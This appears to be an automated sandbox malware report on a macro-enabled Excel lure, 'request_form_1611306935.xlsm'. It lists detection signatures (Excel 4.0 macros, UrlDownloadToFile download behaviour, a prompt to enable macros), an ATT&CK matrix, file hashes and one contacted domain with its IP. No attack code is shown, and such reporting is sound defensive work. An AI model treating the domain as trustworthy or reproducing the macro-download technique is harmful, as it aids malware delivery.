Analysis Report request_form_1611306935.xlsm
Overview
General Information
Detection
Score: | 64 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
Startup |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
No yara matches |
---|
Sigma Overview |
---|
No Sigma rule has matched |
---|
Signature Overview |
---|
Click to jump to signature section
Compliance: |
---|
Uses new MSVCR Dlls | Show sources |
Source: | File opened: | Jump to behavior |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Software Vulnerabilities: |
---|
Document exploit detected (creates forbidden files) | Show sources |
Source: | File created: | Jump to behavior |
Document exploit detected (UrlDownloadToFile) | Show sources |
Source: | Section loaded: | Jump to behavior |
Source: | DNS query: |
Source: | TCP traffic: |
Source: | TCP traffic: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
System Summary: |
---|
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) | Show sources |
Source: | Screenshot OCR: |
Found Excel 4.0 Macro with suspicious formulas | Show sources |
Source: | Initial sample: |
Source: | Binary string: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Window detected: |
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: |
Source: | Key opened: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Replication Through Removable Media1 | Scripting11 | Path Interception | Path Interception | Masquerading1 | OS Credential Dumping | Peripheral Device Discovery11 | Replication Through Removable Media1 | Data from Local System | Exfiltration Over Other Network Medium | Non-Application Layer Protocol2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Exploitation for Client Execution23 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | File and Directory Discovery1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Application Layer Protocol12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Scripting11 | Security Account Manager | System Information Discovery1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Ingress Tool Transfer1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Behavior Graph |
---|
Screenshots |
---|
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
9% | ReversingLabs | Document-Excel.Trojan.Heuristic |
Dropped Files |
---|
No Antivirus matches |
---|
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
No Antivirus matches |
---|
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe |
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
jvdattorney.com | 162.241.225.18 | true | false | unknown |
Contacted URLs |
---|
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false |
| unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown |
Contacted IPs |
---|
General Information |
---|
Joe Sandbox Version: | 31.0.0 Red Diamond |
Analysis ID: | 343133 |
Start date: | 22.01.2021 |
Start time: | 11:45:45 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 4m 16s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | request_form_1611306935.xlsm |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Run name: | Potential for more IOCs and behavior |
Number of analysed new started processes analysed: | 23 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal64.expl.evad.winXLSM@2/12@1/2 |
Cookbook Comments: |
|
Warnings: | Show All
|
Simulations |
---|
Behavior and APIs |
---|
No simulations |
---|
Joe Sandbox View / Context |
---|
IPs |
---|
No context |
---|
Domains |
---|
No context |
---|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
UNIFIEDLAYER-AS-1US | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
JA3 Fingerprints |
---|
No context |
---|
Dropped Files |
---|
No context |
---|
Created / dropped Files |
---|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 132942 |
Entropy (8bit): | 5.372898345467023 |
Encrypted: | false |
SSDEEP: | 1536:wcQceNgaBtA3gZw+pQ9DQW+zAUH34ZldpKWXboOilXPErLL8Eh:WrQ9DQW+zBX8P |
MD5: | 9E81AE6834204F1603D85DB0F2715445 |
SHA1: | 0AAFB5D472B443DFF15C924BB333D312FE8DA476 |
SHA-256: | 882A40C2C8A9835D2BA318020A8DFFAB7A5970CFB8457CB9D0BE9C18C58F01B8 |
SHA-512: | 0A76B9FD31BEBA4C0B1620C32BED2A5F8D4A2E1FC9A4015131874BEB6D0A2D57E7BBBE716FA1CB724E59A24AE919B0EBE06BB09BF16BF32F07CBBA6CE0CF211C |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 1028 |
Entropy (8bit): | 7.761039651897249 |
Encrypted: | false |
SSDEEP: | 24:OZYvitHj0T5rwDxmsYnNk56uCnIw2+ujc:O6vitHQT5rvn1ud+uA |
MD5: | 600F503BC1066BEB5FB5DD494AA1CD74 |
SHA1: | A504D5E687B98F9E0FD2896DFC8492DE0F974BE6 |
SHA-256: | B06BA2FAAAF371AE2F92D9047FFDAAF1933E03CFBC1E999E8B7CF378E33499C3 |
SHA-512: | B7D40CDCD4F442E8941947AF64343D8A06CA8C9710E74BE8E00245C5A67DF574ED243D2B988814843C0AD9483D7058EC355CE087665FFDA5C484CBDF8FD40E40 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 677 |
Entropy (8bit): | 7.433026174405032 |
Encrypted: | false |
SSDEEP: | 12:6v/7RllfMXWaBlhV/Jk6gGPRRKyiaWH/LpR5PTQ6//blm1X+fZ8w5s7nP9Np971x:OZYZnDqkZiaOtnEuA1X+a0sL1L9cLUa6 |
MD5: | 55E8A29B221E51BE421B7D4F5F5F7E52 |
SHA1: | 117E73181FC9CDAA0904C6372D68EE48CEDC14E4 |
SHA-256: | B54D8571DB2F8FC570144F24EF7A42CE93FAB269AF166BF1234DBD2F96D86EB8 |
SHA-512: | 8592A133D815BBC225336F9149A4C89244CBCDEACC958470126DCD266DA8590C587D50D56A7F70771568C4D015BF55642DAAD6434F1C47E8BBBC4AB691694654 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 677 |
Entropy (8bit): | 7.433026174405032 |
Encrypted: | false |
SSDEEP: | 12:6v/7RllfMXWaBlhV/Jk6gGPRRKyiaWH/LpR5PTQ6//blm1X+fZ8w5s7nP9Np971x:OZYZnDqkZiaOtnEuA1X+a0sL1L9cLUa6 |
MD5: | 55E8A29B221E51BE421B7D4F5F5F7E52 |
SHA1: | 117E73181FC9CDAA0904C6372D68EE48CEDC14E4 |
SHA-256: | B54D8571DB2F8FC570144F24EF7A42CE93FAB269AF166BF1234DBD2F96D86EB8 |
SHA-512: | 8592A133D815BBC225336F9149A4C89244CBCDEACC958470126DCD266DA8590C587D50D56A7F70771568C4D015BF55642DAAD6434F1C47E8BBBC4AB691694654 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 1028 |
Entropy (8bit): | 7.761039651897249 |
Encrypted: | false |
SSDEEP: | 24:OZYvitHj0T5rwDxmsYnNk56uCnIw2+ujc:O6vitHQT5rvn1ud+uA |
MD5: | 600F503BC1066BEB5FB5DD494AA1CD74 |
SHA1: | A504D5E687B98F9E0FD2896DFC8492DE0F974BE6 |
SHA-256: | B06BA2FAAAF371AE2F92D9047FFDAAF1933E03CFBC1E999E8B7CF378E33499C3 |
SHA-512: | B7D40CDCD4F442E8941947AF64343D8A06CA8C9710E74BE8E00245C5A67DF574ED243D2B988814843C0AD9483D7058EC355CE087665FFDA5C484CBDF8FD40E40 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 16999 |
Entropy (8bit): | 7.245623688499512 |
Encrypted: | false |
SSDEEP: | 192:LYUGo7Hs+KmIqbuGwTLHd8TS9/P2iponEKUAVi+mEqM6AH2HyFUt:LY/ks/hTLHdV9uiMEKk+RqNueh |
MD5: | 17A33B944AE3D430755B936573D29D81 |
SHA1: | 4F857FFA6B96040D1A599282395C9B235CED47D2 |
SHA-256: | EABF400B7FFF9E0E3826E21CE1B6C0B27A2AA691433828D4929DB86BAD2B5D95 |
SHA-512: | 8E6B06B37D1847FFCCD55057B136A2C0DA6C03FE58B62BAB0A9BBCFF4DC89A09AE2399488C8FDDBA907D24260227BA3DD8921547C54EB9C7D11CB308E8192FFC |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 904 |
Entropy (8bit): | 4.649128754247888 |
Encrypted: | false |
SSDEEP: | 12:8NCXUkpuElPCH2A5PbMpn0Q+WrjAZ/2bD0lTLC5Lu4t2Y+xIBjKZm:8NbFbMWqAZiDZ87aB6m |
MD5: | 05AD3606B833EAA097DF939096EE6EA0 |
SHA1: | A5EFA39CD586BF3659178FAEF3EC042199E71967 |
SHA-256: | 6685163881E61FFAB7DEDF34436D05DCA15E3C1187706627ED027F12084F729B |
SHA-512: | 61AC7C66C306C4630C5AC1DF27AF32D9B6984A2695351496F96FCE666E170096B2665D1401B9E568554CD57F3574E796CD9523890119D56A00A69C392002AD05 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | modified |
Size (bytes): | 299 |
Entropy (8bit): | 4.757013773544315 |
Encrypted: | false |
SSDEEP: | 6:djYOWJcWapmHWJcWapmOWJcWapmHWJcWapmOWJcWapmHWJcWapmOWJcWapc:dMOWlapmHWlapmOWlapmHWlapmOWlap5 |
MD5: | 3C08FBB167AAFDACB0B5E3B1F6A3D53A |
SHA1: | C8FCEE10CE6CF142E9D8974C414CA8E6573F193A |
SHA-256: | 9BEA52E05C051EF5969E66129F5F2E0D2641E85F12BC502BF266B409471C000B |
SHA-512: | 617CE063F07333C514EB4A3109F0283D23C5115AFCF6315D24DB67949937606AA6119E4D851098BFDEF551F39DFFE7F9A4986905FF6BD81750C07939DC82C0EB |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 4500 |
Entropy (8bit): | 4.702877924238364 |
Encrypted: | false |
SSDEEP: | 48:84vZ6Dwko6spB6p4vZ6Dwko6spB6pavZ6Dwko6spB6pavZ6Dwko6spB6:8BHspKBHspKTHspKTHsp |
MD5: | A9A64A3AB585A26CD43F18B24CCDF015 |
SHA1: | 4B3E85A65E716D45C9686C7A8D70F2AFDB515E78 |
SHA-256: | A57711BB2548B645E1EBD353E09FB76227117ED79D5170E9C254C18A61D2AE3F |
SHA-512: | 64E645F1A498B10DEF3CBD450AA66DAF0344115D521E33DB6F47F183F0DEB3FE9AA5EA6EE7FDF084706D9173B46CEAFE6B59AE18538D13FD1A0F64FB6EE60485 |
Malicious: | true |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 16999 |
Entropy (8bit): | 7.245623688499512 |
Encrypted: | false |
SSDEEP: | 192:LYUGo7Hs+KmIqbuGwTLHd8TS9/P2iponEKUAVi+mEqM6AH2HyFUt:LY/ks/hTLHdV9uiMEKk+RqNueh |
MD5: | 17A33B944AE3D430755B936573D29D81 |
SHA1: | 4F857FFA6B96040D1A599282395C9B235CED47D2 |
SHA-256: | EABF400B7FFF9E0E3826E21CE1B6C0B27A2AA691433828D4929DB86BAD2B5D95 |
SHA-512: | 8E6B06B37D1847FFCCD55057B136A2C0DA6C03FE58B62BAB0A9BBCFF4DC89A09AE2399488C8FDDBA907D24260227BA3DD8921547C54EB9C7D11CB308E8192FFC |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 495 |
Entropy (8bit): | 1.6081032063576088 |
Encrypted: | false |
SSDEEP: | 3:RFXI6dtBhFXI6dtBhFXI6dtt:RJZhJZhJ1 |
MD5: | 28C0C942161F749E335A76E714AACA29 |
SHA1: | 53D07F227E4A2F3AF5373958409A19DE1FA1CF9C |
SHA-256: | BA0AB47EA8285A45E0884C5916C7C3052BE3C5245A0FC350DF4E83B91BC2A3F5 |
SHA-512: | 075F04CF77A30D166E9C04A6376629508A854F9218CEA194EC1D69A65669C51F3A0858697F258AF0DF5954DE02C7EEF2D060B6F69D8194D4D4A95D2C94900DAE |
Malicious: | true |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 0 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:: |
MD5: | D41D8CD98F00B204E9800998ECF8427E |
SHA1: | DA39A3EE5E6B4B0D3255BFEF95601890AFD80709 |
SHA-256: | E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855 |
SHA-512: | CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.245499147058293 |
TrID: |
|
File name: | request_form_1611306935.xlsm |
File size: | 17127 |
MD5: | 5fd958006a94c6145364c06bbf264d06 |
SHA1: | d5cc7dc1083508dbe5531db67a3f78866e00330c |
SHA256: | f41c4588d2ef8936d9417069a1c5a44833fb2994c60c54bda14b1aac9aa7b83a |
SHA512: | a8c80661725284a629ec45f25331ea1349f63f4ea8245ae6c6fb62b9e3ac6114889c6b909c34332acd403ac7f0448a1692165b888aa8f7c4fa0ef8fbb404c0d9 |
SSDEEP: | 384:rNUK4o2aGcnzJTABwiMEx4o9QC32XRRl4Y:JUpaGcPiML8QC32blP |
File Content Preview: | PK..........!.................[Content_Types].xml ...(...............!!........................................................................................................................................................................................ |
File Icon |
---|
Icon Hash: | 74ecd0e2f696908c |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OpenXML | |
Number of OLE Files: | 1 |
OLE File "request_form_1611306935.xlsm" |
---|
Indicators | |
---|---|
Has Summary Info: | |
Application Name: | |
Encrypted Document: | |
Contains Word Document Stream: | |
